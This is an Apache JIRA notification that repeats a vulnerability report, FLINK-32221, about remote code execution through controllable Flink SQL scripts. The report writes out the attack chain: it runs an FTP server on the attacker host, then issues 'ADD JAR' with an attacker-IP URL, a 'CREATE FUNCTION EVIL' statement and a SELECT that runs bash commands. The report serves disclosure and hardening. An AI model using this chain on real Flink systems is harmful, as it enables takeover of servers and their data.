[
https://issues.apache.org/jira/browse/FLINK-32221?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
gaoyu shi updated FLINK-32221:
------------------------------
Description:
Flink SQL script has similiar syntax with tradition SQL, which means it also
suffer SQL injection vulnerbility.
Attacker can achieve Remote Code Execution when they can control part of whole
of the Flink SQL script content by following steps.
1. attacker develop an evil custom Scalar Function class and package it into
jar.
!image-2023-05-31-14-59-50-875.png|width=721,height=251!
2. run a ftp server on attacker host, and put the evil jar in it.
{code:java}
// install python-ftp-server tool
pip install python-ftp-server
// run ftp server
python3 -m python_ftp_server -d . --ip <attacker-public-interface ip> -p
password
// copy evil jar to current directory
cp <evil.jar-path> .{code}
3. Input the Flink SQL script to trigger code execution, which assumes that the
attacker can control part or whole of the Flink SQL script through SQL
injection or other method.
{code:java}
// transfer the evil jar from attacker host to victim
ADD JAR 'ftp://user:password@<attacker-ip>:60000/evil.jar';
// register the evil function into the SQL context
CREATE FUNCTION EVIL AS 'org.example.Evil';
// run any bash command
SELECT EVIL('<bash command>'); {code}
In summary, this vulnerbility allows attacker get remote code execution through
Flink SQL script. After looking at several websites that use flink, it is very
common to concat user input into Flink SQL statements, or even directly allow
users to enter arbitrary Flink SQL scripts to process data.
I allow that it is not a vulnerability to execute malicious code through
Flink's web interface to submit a malicious jar package, because developers
will hide Flink's web interface by default, such as only listening to
localhost. However, malicious code execution through Flink SQL scripts is
completely different. Currently, there is no hardening method or default
configuration that can prevent attackers from using Flink SQL to achieve
arbitrary code execution.
Suggestion:
'ADD JAR' command should not be able to load remote jar, or it should be
disable by default at least.
was:
Flink SQL script has similiar syntax with tradition SQL, which means it also
suffer SQL injection vulnerbility.
Attacker can achieve Remote Code Execution when they can control part of whole
of the Flink SQL script content by following steps.
1. attacker develop an evil custom Scalar Function class and package it into
jar.
!image-2023-05-31-14-59-50-875.png|width=721,height=251!
2. run a ftp server on attacker host, and put the evil jar in it.
{code:java}
// install python-ftp-server tool
pip install python-ftp-server
// run ftp server
python3 -m python_ftp_server -d . --ip <public interface ip> -p password
// copy evil jar to current directory
cp <evil.jar-path> .{code}
3. Input the Flink SQL script to trigger code execution, which assumes that the
attacker can control part or whole of the Flink SQL script through SQL
injection or other method.
{code:java}
// transfer the evil jar from attacker host to victim
ADD JAR 'ftp://user:password@<attacker-ip>:60000/evil.jar';
// register the evil function into the SQL context
CREATE FUNCTION EVIL AS 'org.example.Evil';
// run any bash command
SELECT EVIL('<bash command>'); {code}
In summary, this vulnerbility allows attacker get remote code execution through
Flink SQL script. After looking at several websites that use flink, it is very
common to concat user input into Flink SQL statements, or even directly allow
users to enter arbitrary Flink SQL scripts to process data.
I allow that it is not a vulnerability to execute malicious code through
Flink's web interface to submit a malicious jar package, because developers
will hide Flink's web interface by default, such as only listening to
localhost. However, malicious code execution through Flink SQL scripts is
completely different. Currently, there is no hardening method or default
configuration that can prevent attackers from using Flink SQL to achieve
arbitrary code execution.
Suggestion:
'ADD JAR' command should not be able to load remote jar, or it should be
disable by default at least.
> Attacker can achieve Remote Code Execution when they can control Flink SQL
> script content
> ------------------------------------------------------------------------------------------
>
> Key: FLINK-32221
> URL: https://issues.apache.org/jira/browse/FLINK-32221
> Project: Flink
> Issue Type: Bug
> Environment: all version that support SQL Script.
> Reporter: gaoyu shi
> Priority: Major
> Attachments: image-2023-05-31-14-58-21-800.png,
> image-2023-05-31-14-59-50-875.png
>
>
> Flink SQL script has similiar syntax with tradition SQL, which means it also
> suffer SQL injection vulnerbility.
> Attacker can achieve Remote Code Execution when they can control part of
> whole of the Flink SQL script content by following steps.
> 1. attacker develop an evil custom Scalar Function class and package it into
> jar.
> !image-2023-05-31-14-59-50-875.png|width=721,height=251!
> 2. run a ftp server on attacker host, and put the evil jar in it.
>
> {code:java}
> // install python-ftp-server tool
> pip install python-ftp-server
> // run ftp server
> python3 -m python_ftp_server -d . --ip <attacker-public-interface ip> -p
> password
> // copy evil jar to current directory
> cp <evil.jar-path> .{code}
> 3. Input the Flink SQL script to trigger code execution, which assumes that
> the attacker can control part or whole of the Flink SQL script through SQL
> injection or other method.
>
>
> {code:java}
> // transfer the evil jar from attacker host to victim
> ADD JAR 'ftp://user:password@<attacker-ip>:60000/evil.jar';
> // register the evil function into the SQL context
> CREATE FUNCTION EVIL AS 'org.example.Evil';
> // run any bash command
> SELECT EVIL('<bash command>'); {code}
>
>
> In summary, this vulnerbility allows attacker get remote code execution
> through Flink SQL script. After looking at several websites that use flink,
> it is very common to concat user input into Flink SQL statements, or even
> directly allow users to enter arbitrary Flink SQL scripts to process data.
> I allow that it is not a vulnerability to execute malicious code through
> Flink's web interface to submit a malicious jar package, because developers
> will hide Flink's web interface by default, such as only listening to
> localhost. However, malicious code execution through Flink SQL scripts is
> completely different. Currently, there is no hardening method or default
> configuration that can prevent attackers from using Flink SQL to achieve
> arbitrary code execution.
> Suggestion:
> 'ADD JAR' command should not be able to load remote jar, or it should be
> disable by default at least.
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
